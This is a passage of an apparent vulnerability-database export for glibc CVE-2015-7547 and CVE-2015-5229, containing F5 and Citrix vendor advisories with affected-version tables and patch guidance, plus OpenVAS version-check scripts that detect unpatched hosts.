to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the **Severity** values published in the previous table. 
The** Severity **values and other security vulnerability parameters are defined in SOL4602: Overview of the F5 security vulnerability response policy.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4918: Overview of the F5 critical issue hotfix policy\n", "edition": 1, "modified": "2016-04-26T00:00:00", "published": "2016-04-26T00:00:00", "id": "SOL23822215", "href": "http://support.f5.com/kb/en-us/solutions/public/k/23/sol23822215.html", "title": "SOL23822215 - glibc calloc vulnerability CVE-2015-5229", "type": "f5", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-02-20T21:07:46", "bulletinFamily": "software", "cvelist": ["CVE-2015-7547"], "description": "\nF5 Product Development has assigned ID 574060 to this vulnerability, and has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| 12.0.0| 12.1.0 \n12.0.0 HF2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4| Severe| glibc DNS client side resolver \nBIG-IP AAM| 12.0.0| 12.1.0 \n12.0.0 HF2 \n11.4.0 - 11.6.1| Severe| glibc DNS client side resolver \nBIG-IP AFM| 12.0.0| 12.1.0 \n12.0.0 HF2 \n11.3.0 - 11.6.1| Severe| glibc DNS client side resolver \nBIG-IP Analytics| 12.0.0| 12.1.0 \n12.0.0 HF2 \n11.0.0 - 11.6.1| Severe| glibc DNS client side resolver \nBIG-IP APM| 12.0.0| 12.1.0 \n12.0.0 HF2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4| Severe| glibc DNS client side resolver \nBIG-IP ASM| 12.0.0| 12.1.0 \n12.0.0 HF2 \n11.0.0 - 11.6.1 
\n10.1.0 - 10.2.4| Severe| glibc DNS client side resolver \nBIG-IP DNS| 12.0.0| 12.1.0 \n12.0.0 HF2| Severe| glibc DNS client side resolver \nBIG-IP Edge Gateway| None| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP GTM| None| 11.0.0 - 11.6.1 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP Link Controller| 12.0.0| 12.1.0 \n12.0.0 HF2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4| Severe| glibc DNS client side resolver \nBIG-IP PEM| 12.0.0| 12.1.0 \n12.0.0 HF2 \n11.3.0 - 11.6.1| Severe| glibc DNS client side resolver \nBIG-IP PSM| None| 11.0.0 - 11.4.1 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP WOM| None| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nARX| None| 6.2.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| None| 3.0.0 - 3.1.1| Not vulnerable| None \nFirePass| None| 7.0.0| Not vulnerable| None \nBIG-IQ Cloud| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.2.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nF5 WebSafe*| None| 1.0.0| Not vulnerable| None \nTraffix SDC| None| 4.0.0 - 4.4.0 \n3.3.2 - 3.5.1| Not vulnerable| None \n \n*F5 WebSafe software is not affected by this vulnerability because the Linux kernel does not form part of the product. To address this vulnerability, F5 recommends that you upgrade the operating system that you use with the F5 WebSafe Dashboard using the standard OS tools.\n\nIf you are running a version listed in the **Versions known to be vulnerable **column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. 
If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo mitigate this vulnerability, F5 recommends that you ensure that you use only trusted DNS resolvers in your BIG-IP configuration.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K13123: Managing BIG-IP product hotfixes (11.x - 12.x)](<https://support.f5.com/csp/article/K13123>)\n * [K9502: BIG-IP hotfix matrix](<https://support.f5.com/csp/article/K9502>)\n", "edition": 1, "modified": "2017-03-10T00:27:00", "published": "2016-02-17T03:33:00", "id": "F5:K47098834", "href": "https://support.f5.com/csp/article/K47098834", "title": "glibc vulnerability CVE-2015-7547", "type": "f5", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-10-25T17:25:00", "bulletinFamily": "software", "cvelist": ["CVE-2015-7547"], "edition": 1, "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to be vulnerable **column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. 
If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo mitigate this vulnerability, F5 recommends that you ensure that you use only trusted DNS resolvers in your BIG-IP configuration.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n * SOL13123: Managing BIG-IP product hotfixes (11.x - 12.x)\n * SOL9502: BIG-IP hotfix matrix\n", "modified": "2016-10-25T00:00:00", "published": "2016-02-16T00:00:00", "id": "SOL47098834", "href": "http://support.f5.com/kb/en-us/solutions/public/k/47/sol47098834.html", "type": "f5", "title": "SOL47098834 - glibc vulnerability CVE-2015-7547", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "citrix": [{"lastseen": "2020-11-18T15:29:33", "bulletinFamily": "software", "cvelist": ["CVE-2015-7547"], "description": "<section class=\"article-content\" data-swapid=\"ArticleContent\">\n<div class=\"content-block\" data-swapid=\"ContentBlock\"><div>\n<div>\n<h2> Overview</h2>\n<div>\n<div>\n<div>\n<p>A vulnerability has been recently disclosed in the glibc <i>getaddrinfo()</i> function. This issue could potentially allow an attacker to inject code into a process that calls the vulnerable function. The issue has been assigned the following CVE identifier:</p>\n<p>CVE-2015-7547: <u> <a href=\"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7547\">https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7547</a></u></p>\n<p>The vulnerable function is provided by some Linux based operating systems. 
Customers managing Linux platforms on which Citrix components are deployed are advised to apply any appropriate operating system updates as soon as possible.</p>\n<p>The following sections provide guidance on the impact and mitigation steps for Linux-based Citrix products. Citrix products that do not include or execute on a Linux based platform are not impacted by this vulnerability.</p>\n<p>Windows based components of XenDesktop and XenApp do not include, or use, the vulnerable function and are therefore not impacted by this issue.</p>\n</div>\n</div>\n</div>\n</div>\n<div>\n<h2> What Citrix is Doing</h2>\n<div>\n<div>\n<div>\n<p>Citrix is in the process of analyzing the potential impact of this issue on currently supported products that use or include the vulnerable component. The following section of this advisory provides more information on each product.</p>\n</div>\n</div>\n</div>\n</div>\n<div>\n<h2> Product Details</h2>\n<div>\n<div>\n<div>\n<h2> Citrix NetScaler</h2>\n<div>\n<div>\n<div>\n<p>NetScaler VPX, NetScaler MPX, NetScaler SDX, NetScaler Insight Center and Command Center Appliance are not affected by this vulnerability.</p>\n<p>The NetScaler Gateway Client for Linux may be impacted by this operating system vulnerability. Citrix recommends that customers apply any applicable patches to the underlying Linux operating system.</p>\n</div>\n</div>\n</div>\n</div>\n<div>\n<h2> Citrix XenServer</h2>\n<div>\n<div>\n<div>\n<p>Currently supported versions of Citrix XenServer do not contain a vulnerable version of glibc and, as such, are not affected by this vulnerability.</p>\n</div>\n</div>\n</div>\n</div>\n<div>\n<h2> Citrix XenMobile</h2>\n<div>\n<div>\n<div>\n<p>Citrix XenMobile MDM 9.x for Windows is not impacted by this vulnerability. 
Worx Apps and MDX are not impacted by this vulnerability.</p>\n<p>The following XenMobile product versions are impacted by this vulnerability:</p>\n<ul>\n<li>XenMobile Server 10.x: XenMobile Server 10.3 Rolling Patch 1 and earlier</li>\n<li>XenMobile App Controller 9.x: XenMobile App Controller 9.0 Rolling Patch 6 and earlier</li>\n</ul>\n<p>To address this vulnerability customers should apply the following updates:</p>\n<ul>\n<li>XenMobile Server 10.3 Rolling Patch 2 - <a href=\"https://support.citrix.com/article/CTX209294\">https://support.citrix.com/article/CTX209294</a></li>\n<li>XenMobile App Controller 9.0 Rolling Patch 7 - <a href=\"https://support.citrix.com/article/CTX207571\">https://support.citrix.com/article/CTX207571</a></li>\n</ul>\n<p>XenMobile Cloud customer deployments have been patched by the Citrix XenMobile Cloud Operations team. For more details contact technical support. </p>\n</div>\n</div>\n</div>\n</div>\n<div>\n<h2> Citrix Receiver for Linux</h2>\n<div>\n<div>\n<div>\n<p>The Receiver for Linux may be impacted by this operating system vulnerability. Citrix recommends that customers apply any applicable patches to the underlying Linux operating system.</p>\n</div>\n</div>\n</div>\n</div>\n<div>\n<h2> Citrix Linux Virtual Desktop</h2>\n<div>\n<div>\n<div>\n<p>Citrix Linux Virtual Desktop deployments may be impacted by this operating system vulnerability. Citrix recommends that customers apply any applicable patches to the underlying Linux operating system.</p>\n</div>\n</div>\n</div>\n</div>\n<div>\n<h2> Citrix Licensing</h2>\n<div>\n<div>\n<div>\n<p>The License Server VPX appliance does contain a vulnerable version of glibc. Citrix has released a new version of the License Server VPX, 11.13.1.2, that addresses this issue. 
This new version can be downloaded from the following location on the Citrix Website:</p>\n<p> <br/> <a href=\"https://www.citrix.com/downloads/licensing.html\">https://www.citrix.com/downloads/licensing.html</a></p>\n<p> <br/> Customers using older versions of the License Server VPX that are not able to upgrade can, as an interim measure, log in to the License Server console and update the VPX using the following command from the command line:</p>\n<p> <br/> yum update</p>\n<p> <br/> Following the completion of the update, the server should be rebooted to ensure that the updated packages are used.</p>\n</div>\n</div>\n</div>\n</div>\n<div>\n<h2> Citrix XenDesktop Volume Worker Template</h2>\n<div>\n<div>\n<div>\n<p>Customers deploying Virtual Desktop Agents that are hosted on Citrix CloudPlatform are advised to verify that the volume worker template is using a version of glibc that is not vulnerable to this issue. Setup instructions for the volume worker template on CloudPlatform can be found in the following document: <a href=\"http://docs.citrix.com/content/dam/docs/en-us/cloudplatform/cloudplatform-43/downloads/xa-xd-cloudplatform_2014.pdf\">http://docs.citrix.com/content/dam/docs/en-us/cloudplatform/cloudplatform-43/downloads/xa-xd-cloudplatform_2014.pdf</a>.</p>\n<p>Amazon Web Services based deployments use the Linux AMI template. Guidance from Amazon about this issue can be found at the following location: <a href=\"https://aws.amazon.com/security/security-bulletins/cve-2015-7547-advisory/\">https://aws.amazon.com/security/security-bulletins/cve-2015-7547-advisory/</a></p>\n</div>\n</div>\n</div>\n</div>\n<div>\n<h2> Citrix VDI in a Box</h2>\n<div>\n<div>\n<div>\n<p>Citrix VDI-In-A-Box (VIAB) version 5.4.x is impacted by this vulnerability. A new version of VIAB, 5.4.8, has been released to address this vulnerability. 
This can be found at the following address: </p>\n<p> <a href=\"https://www.citrix.com/downloads/vdi-in-a-box.html\">https://www.citrix.com/downloads/vdi-in-a-box.html</a></p>\n</div>\n</div>\n</div>\n</div>\n<div>\n<h2> Citrix CloudBridge</h2>\n<div>\n<div>\n<div>\n<p>Citrix CloudBridge 7.x does not contain a vulnerable version of glibc and, as such, is not affected by this vulnerability. Analysis of the impact of this issue on Citrix CloudBridge 8.x is in progress. This section will be updated as soon as additional information is available.</p>\n</div>\n</div>\n</div>\n</div>\n<div>\n<h2> Citrix ByteMobile</h2>\n<div>\n<div>\n<div>\n<p>Analysis of the impact of this issue on Citrix ByteMobile is in progress. This section will be updated as soon as additional information is available.</p>\n</div>\n</div>\n</div>\n</div>\n<div>\n<p>The above list will be updated as the analysis into this issue progresses.</p>\n</div>\n</div>\n</div>\n</div>\n<div>\n<h2> Obtaining Support on This Issue</h2>\n<div>\n<div>\n<div>\n<div>\n<div>\n<p>If you require technical assistance with this issue, please contact Citrix Technical Support. Contact details for Citrix Technical Support are available at <u> <a href=\"https://www.citrix.com/support/open-a-support-case.html\">https://www.citrix.com/support/open-a-support-case.html</a></u>. </p>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div>\n<h2> Reporting Security Vulnerabilities</h2>\n<div>\n<div>\n<div>\n<div>\n<div>\n<p>Citrix welcomes input regarding the security of its products and considers any and all potential vulnerabilities seriously. 
For guidance on how to report security-related issues to Citrix, please see the following document: CTX081743 \u2013 <a href=\"http://support.citrix.com/article/CTX081743\">Reporting Security Issues to Citrix</a></p>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div>\n<h2> Changelog</h2>\n<div>\n<div>\n<div>\n<table width=\"100%\">\n<tbody>\n<tr>\n<th colspan=\"1\" rowspan=\"1\">Date</th>\n<th colspan=\"1\" rowspan=\"1\">Change</th>\n</tr>\n<tr>\n<td colspan=\"1\" rowspan=\"1\" width=\"150\">February 19th 2016</td>\n<td colspan=\"1\" rowspan=\"1\">Initial bulletin publishing</td>\n</tr>\n<tr>\n<td colspan=\"1\" rowspan=\"1\">February 19th 2016</td>\n<td colspan=\"1\" rowspan=\"1\">Update to NetScaler and XenMobile sections, addition of CloudBridge and ByteMobile sections</td>\n</tr>\n<tr>\n<td colspan=\"1\" rowspan=\"1\">February 22nd 2016</td>\n<td colspan=\"1\" rowspan=\"1\">Update to NetScaler section for Command Center Appliance</td>\n</tr>\n<tr>\n<td colspan=\"1\" rowspan=\"1\">February 23rd 2016</td>\n<td colspan=\"1\" rowspan=\"1\">Update to NetScaler section for Netscaler Gateway Client on Linux</td>\n</tr>\n<tr>\n<td colspan=\"1\" rowspan=\"1\">March 14th 2016</td>\n<td colspan=\"1\" rowspan=\"1\">Update to Licensing section</td>\n</tr>\n<tr>\n<td colspan=\"1\" rowspan=\"1\">May 5th 2016</td>\n<td colspan=\"1\" rowspan=\"1\">Update to XenMobile section</td>\n</tr>\n<tr>\n<td colspan=\"1\" rowspan=\"1\">May 9th 2016</td>\n<td colspan=\"1\" rowspan=\"1\">Clarify XenMobile section</td>\n</tr>\n<tr>\n<td colspan=\"1\" rowspan=\"1\">May 16th 2016</td>\n<td colspan=\"1\" rowspan=\"1\">Update to XenDesktop Volume Worker Template section</td>\n</tr>\n<tr>\n<td colspan=\"1\" rowspan=\"1\">November 17th 2016</td>\n<td colspan=\"1\" rowspan=\"1\">Update to VDI in a Box section</td>\n</tr>\n</tbody>\n</table>\n</div>\n</div>\n</div>\n</div>\n</div></div>\n</section>", "edition": 2, "modified": "2019-08-15T04:00:00", "published": "2016-02-19T04:00:00", "id": 
"CTX206991", "href": "https://support.citrix.com/article/CTX206991", "title": "CVE-2015-7547 - Citrix Security Advisory for glibc Vulnerability", "type": "citrix", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2020-04-07T18:43:39", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-7547"], "description": "The remote host is missing a security patch.", "modified": "2020-04-03T00:00:00", "published": "2016-02-23T00:00:00", "id": "OPENVAS:1361412562310105554", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105554", "type": "openvas", "title": "F5 BIG-IP - SOL47098834 - glibc vulnerability CVE-2015-7547", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# F5 BIG-IP - SOL47098834 - glibc vulnerability CVE-2015-7547\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/h:f5:big-ip\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105554\");\n script_cve_id(\"CVE-2015-7547\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_version(\"2020-04-03T06:15:47+0000\");\n\n script_name(\"F5 BIG-IP - SOL47098834 - glibc vulnerability CVE-2015-7547\");\n\n script_xref(name:\"URL\", value:\"https://support.f5.com/kb/en-us/solutions/public/k/47/sol47098834.html?sr=51723063\");\n\n script_tag(name:\"impact\", value:\"Currently unknown\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The glibc DNS client side resolver is vulnerable to a stack-based buffer overflow when the getaddrinfo() library function is used. 
Software using this function may be exploited with attacker-controlled domain names, attacker-controlled DNS servers, or through a man-in-the-middle attack.\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing a security patch.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"2020-04-03 06:15:47 +0000 (Fri, 03 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-02-23 10:30:37 +0100 (Tue, 23 Feb 2016)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"F5 Local Security Checks\");\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_dependencies(\"gb_f5_big_ip_version.nasl\");\n script_mandatory_keys(\"f5/big_ip/version\", \"f5/big_ip/active_modules\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"list_array_func.inc\");\ninclude(\"f5.inc\");\n\nif( ! 
version = get_app_version( cpe:CPE ) )\n exit( 0 );\n\ncheck_f5['LTM'] = make_array( 'affected', '12.0.0;',\n 'unaffected', '12.1.0;12.0.0_HF2;11.0.0-11.6.0;10.1.0-10.2.4;' );\n\ncheck_f5['AAM'] = make_array( 'affected', '12.0.0;',\n 'unaffected', '12.1.0;12.0.0_HF2;11.4.0-11.6.0;' );\n\ncheck_f5['AFM'] = make_array( 'affected', '12.0.0;',\n 'unaffected', '12.1.0;12.0.0_HF2;11.3.0-11.6.0;' );\n\ncheck_f5['AVR'] = make_array( 'affected', '12.0.0;',\n 'unaffected', '12.1.0;12.0.0_HF2;11.0.0-11.6.0;' );\n\ncheck_f5['APM'] = make_array( 'affected', '12.0.0;',\n 'unaffected', '12.1.0;12.0.0_HF2;11.0.0-11.6.0;10.1.0-10.2.4;' );\n\ncheck_f5['ASM'] = make_array( 'affected', '12.0.0;',\n 'unaffected', '12.1.0;12.0.0_HF2;11.0.0-11.6.0;10.1.0-10.2.4;' );\n\ncheck_f5['LC'] = make_array( 'affected', '12.0.0;',\n 'unaffected', '12.1.0;12.0.0_HF2;11.0.0-11.6.0;10.1.0-10.2.4;' );\n\ncheck_f5['PEM'] = make_array( 'affected', '12.0.0;',\n 'unaffected', '12.1.0;12.0.0_HF2;11.3.0-11.6.0;' );\n\nif( report = f5_is_vulnerable( ca:check_f5, version:version ) ) {\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:00", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-5229", "CVE-2015-7547"], "description": "Oracle Linux Local Security Checks ELSA-2016-0176", "modified": "2019-03-14T00:00:00", "published": "2016-02-18T00:00:00", "id": "OPENVAS:1361412562310122878", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122878", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2016-0176", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2016-0176.nasl 14180 2019-03-14 12:29:16Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2016 Eero Volotinen, http://solinor.com\n#\n# This 
program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122878\");\n script_version(\"$Revision: 14180 $\");\n script_tag(name:\"creation_date\", value:\"2016-02-18 07:27:20 +0200 (Thu, 18 Feb 2016)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-14 13:29:16 +0100 (Thu, 14 Mar 2019) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2016-0176\");\n script_tag(name:\"insight\", value:\"ELSA-2016-0176 - glibc security and bug fix update. 
Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2016-0176\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2016-0176.html\");\n script_cve_id(\"CVE-2015-7547\", \"CVE-2015-5229\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux7\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux7\")\n{\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.17~106.0.1.el7_2.4\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.17~106.0.1.el7_2.4\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.17~106.0.1.el7_2.4\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.17~106.0.1.el7_2.4\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-static\", rpm:\"glibc-static~2.17~106.0.1.el7_2.4\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-utils\", 
rpm:\"glibc-utils~2.17~106.0.1.el7_2.4\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.17~106.0.1.el7_2.4\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:38", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-5229", "CVE-2015-7547"], "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2016-02-17T00:00:00", "id": "OPENVAS:1361412562310871555", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871555", "type": "openvas", "title": "RedHat Update for glibc RHSA-2016:0176-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for glibc RHSA-2016:0176-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871555\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-02-17 06:25:51 +0100 (Wed, 17 Feb 2016)\");\n script_cve_id(\"CVE-2015-5229\", \"CVE-2015-7547\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for glibc RHSA-2016:0176-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'glibc'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The glibc packages provide the standard C\nlibraries (libc), POSIX thread libraries (libpthread), standard math libraries\n(libm), and the name service cache daemon (nscd) used by multiple programs on the\nsystem. Without these libraries, the Linux system cannot function correctly.\n\nA stack-based buffer overflow was found in the way the libresolv library\nperformed dual A/AAAA DNS queries. A remote attacker could create a\nspecially crafted DNS response which could cause libresolv to crash or,\npotentially, execute code with the permissions of the user running the\nlibrary. Note: this issue is only exposed when libresolv is called from the\nnss_dns NSS service module. 
(CVE-2015-7547)\n\nIt was discovered that the calloc implementation in glibc could return\nmemory areas which contain non-zero bytes. This could result in unexpected\napplication behavior such as hangs or crashes. (CVE-2015-5229)\n\nThe CVE-2015-7547 issue was discovered by the Google Security Team and Red\nHat. Red Hat would like to thank Jeff Layton for reporting the\nCVE-2015-5229 issue.\n\nThis update also fixes the following bugs:\n\n * The existing implementation of the 'free' function causes all memory\npools beyond the first to return freed memory directly to the operating\nsystem as quickly as possible. This can result in performance degradation\nwhen the rate of free calls is very high. The first memory pool (the main\npool) does provide a method to rate limit the returns via M_TRIM_THRESHOLD,\nbut this method is not available to subsequent memory pools.\n\nWith this update, the M_TRIM_THRESHOLD method is extended to apply to all\nmemory pools, which improves performance for threads with very high amounts\nof free calls and limits the number of 'madvise' system calls. The change\nalso increases the total transient memory usage by processes because the\ntrim threshold must be reached before memory can be freed.\n\nTo return to the previous behavior, you can either set M_TRIM_THRESHOLD\nusing the 'mallopt' function, or set the MALLOC_TRIM_THRESHOLD environment\nvariable to 0. (BZ#1298930)\n\n * On the little-endian variant of 64-bit IBM Power Systems (ppc64le), a bug\nin the dynamic loader could cause applications compiled with profiling\nenabled to fail to start with the error 'monstartup: out of memory'.\nThe bug has been corrected and applications compiled for profiling now\nstart correctly. (BZ#1298956)\n\nAll glibc users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues.\");\n script_tag(name:\"affected\", value:\"glibc on Red Hat Enterprise Linux Server (v. 
